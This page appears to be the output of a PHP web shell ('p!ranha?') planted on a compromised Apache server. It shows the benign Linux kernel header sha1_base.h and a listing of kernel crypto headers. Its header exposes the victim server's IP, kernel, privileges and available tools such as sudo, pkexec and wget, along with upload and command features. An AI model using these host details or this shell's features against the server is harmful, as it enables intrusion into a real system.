p!ranha?
Server IP : 103.169.32.36  /  Your IP : 216.73.217.13
Web Server : Apache
System : Linux web.dpmptsp 3.10.0-1160.119.1.el7.x86_64 #1 SMP Tue Jun 4 14:43:51 UTC 2024 x86_64
User : apache ( 48)
PHP Version : 5.6.40
Disable Function : NONE
MySQL : ON  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /usr/lib/modules/3.10.0-1160.119.1.el7.x86_64/build/include/crypto/

Upload File :
Curr3nt_D!r [ Writeable ] D0cum3nt_r0Ot [ Writeable ]

 
Command :
Current File : /usr/lib/modules/3.10.0-1160.119.1.el7.x86_64/build/include/crypto/sha1_base.h
/*
 * sha1_base.h - core logic for SHA-1 implementations
 *
 * Copyright (C) 2015 Linaro Ltd <ard.biesheuvel@linaro.org>
 *
 * This program is free software; you can redistribute it and/or modify
 * it under the terms of the GNU General Public License version 2 as
 * published by the Free Software Foundation.
 */

#include <crypto/internal/hash.h>
#include <crypto/sha.h>
#include <linux/crypto.h>
#include <linux/module.h>

#include <asm/unaligned.h>

typedef void (sha1_block_fn)(struct sha1_state *sst, u8 const *src, int blocks);

static inline int sha1_base_init(struct shash_desc *desc)
{
	struct sha1_state *sctx = shash_desc_ctx(desc);

	sctx->state[0] = SHA1_H0;
	sctx->state[1] = SHA1_H1;
	sctx->state[2] = SHA1_H2;
	sctx->state[3] = SHA1_H3;
	sctx->state[4] = SHA1_H4;
	sctx->count = 0;

	return 0;
}

static inline int sha1_base_do_update(struct shash_desc *desc,
				      const u8 *data,
				      unsigned int len,
				      sha1_block_fn *block_fn)
{
	struct sha1_state *sctx = shash_desc_ctx(desc);
	unsigned int partial = sctx->count % SHA1_BLOCK_SIZE;

	sctx->count += len;

	if (unlikely((partial + len) >= SHA1_BLOCK_SIZE)) {
		int blocks;

		if (partial) {
			int p = SHA1_BLOCK_SIZE - partial;

			memcpy(sctx->buffer + partial, data, p);
			data += p;
			len -= p;

			block_fn(sctx, sctx->buffer, 1);
		}

		blocks = len / SHA1_BLOCK_SIZE;
		len %= SHA1_BLOCK_SIZE;

		if (blocks) {
			block_fn(sctx, data, blocks);
			data += blocks * SHA1_BLOCK_SIZE;
		}
		partial = 0;
	}
	if (len)
		memcpy(sctx->buffer + partial, data, len);

	return 0;
}

static inline int sha1_base_do_finalize(struct shash_desc *desc,
					sha1_block_fn *block_fn)
{
	const int bit_offset = SHA1_BLOCK_SIZE - sizeof(__be64);
	struct sha1_state *sctx = shash_desc_ctx(desc);
	__be64 *bits = (__be64 *)(sctx->buffer + bit_offset);
	unsigned int partial = sctx->count % SHA1_BLOCK_SIZE;

	sctx->buffer[partial++] = 0x80;
	if (partial > bit_offset) {
		memset(sctx->buffer + partial, 0x0, SHA1_BLOCK_SIZE - partial);
		partial = 0;

		block_fn(sctx, sctx->buffer, 1);
	}

	memset(sctx->buffer + partial, 0x0, bit_offset - partial);
	*bits = cpu_to_be64(sctx->count << 3);
	block_fn(sctx, sctx->buffer, 1);

	return 0;
}

static inline int sha1_base_finish(struct shash_desc *desc, u8 *out)
{
	struct sha1_state *sctx = shash_desc_ctx(desc);
	__be32 *digest = (__be32 *)out;
	int i;

	for (i = 0; i < SHA1_DIGEST_SIZE / sizeof(__be32); i++)
		put_unaligned_be32(sctx->state[i], digest++);

	*sctx = (struct sha1_state){};
	return 0;
}
N4m3
5!z3
L45t M0d!f!3d
0wn3r / Gr0up
P3Rm!55!0n5
0pt!0n5
..
--
September 29 2025 07:01:09
0 / 0
0755
internal
--
September 29 2025 07:01:15
0 / 0
0755
acompress.h
7.825 KB
November 06 2023 09:15:52
0 / 0
0644
aead.h
2.583 KB
November 06 2023 09:15:52
0 / 0
0644
aes.h
0.995 KB
November 06 2023 09:15:52
0 / 0
0644
akcipher.h
11.523 KB
November 06 2023 09:15:52
0 / 0
0644
algapi.h
10.815 KB
November 06 2023 09:15:52
0 / 0
0644
authenc.h
0.825 KB
November 06 2023 09:15:52
0 / 0
0644
b128ops.h
2.413 KB
November 06 2023 09:15:52
0 / 0
0644
blowfish.h
0.367 KB
November 06 2023 09:15:52
0 / 0
0644
cast5.h
0.538 KB
November 06 2023 09:15:52
0 / 0
0644
cast6.h
0.583 KB
November 06 2023 09:15:52
0 / 0
0644
cast_common.h
0.188 KB
November 06 2023 09:15:52
0 / 0
0644
chacha20.h
0.245 KB
November 06 2023 09:15:52
0 / 0
0644
compress.h
4.01 KB
November 06 2023 09:15:52
0 / 0
0644
cryptd.h
2.054 KB
November 06 2023 09:15:52
0 / 0
0644
crypto_wq.h
0.119 KB
November 06 2023 09:15:52
0 / 0
0644
ctr.h
0.512 KB
November 06 2023 09:15:52
0 / 0
0644
des.h
0.394 KB
November 06 2023 09:15:52
0 / 0
0644
dh.h
0.804 KB
November 06 2023 09:15:52
0 / 0
0644
drbg.h
8.791 KB
November 06 2023 09:15:52
0 / 0
0644
ecdh.h
0.825 KB
November 06 2023 09:15:52
0 / 0
0644
gcm.h
0.137 KB
November 06 2023 09:15:52
0 / 0
0644
gf128mul.h
8.083 KB
November 06 2023 09:15:52
0 / 0
0644
ghash.h
0.334 KB
November 06 2023 09:15:52
0 / 0
0644
hash.h
9.473 KB
November 06 2023 09:15:52
0 / 0
0644
hash_info.h
1.126 KB
November 06 2023 09:15:52
0 / 0
0644
hmac.h
0.131 KB
November 06 2023 09:15:52
0 / 0
0644
if_alg.h
2.288 KB
November 06 2023 09:15:52
0 / 0
0644
kpp.h
8.763 KB
November 06 2023 09:15:52
0 / 0
0644
lrw.h
1.18 KB
November 06 2023 09:15:52
0 / 0
0644
mcryptd.h
2.313 KB
November 06 2023 09:15:52
0 / 0
0644
md5.h
0.281 KB
November 06 2023 09:15:52
0 / 0
0644
padlock.h
0.634 KB
November 06 2023 09:15:52
0 / 0
0644
pcrypt.h
1.401 KB
November 06 2023 09:15:52
0 / 0
0644
pkcs7.h
0.946 KB
November 06 2023 09:15:52
0 / 0
0644
public_key.h
2.664 KB
November 06 2023 09:15:52
0 / 0
0644
rng.h
1.798 KB
November 06 2023 09:15:52
0 / 0
0644
scatterwalk.h
3.348 KB
November 06 2023 09:15:52
0 / 0
0644
serpent.h
0.657 KB
November 06 2023 09:15:52
0 / 0
0644
sha.h
2.656 KB
November 06 2023 09:15:52
0 / 0
0644
sha1_base.h
2.473 KB
November 06 2023 09:15:52
0 / 0
0644
sha256_base.h
3.026 KB
November 06 2023 09:15:52
0 / 0
0644
sha512_base.h
3.194 KB
November 06 2023 09:15:52
0 / 0
0644
skcipher.h
16.099 KB
November 06 2023 09:15:52
0 / 0
0644
twofish.h
0.699 KB
November 06 2023 09:15:52
0 / 0
0644
xts.h
1.187 KB
November 06 2023 09:15:52
0 / 0
0644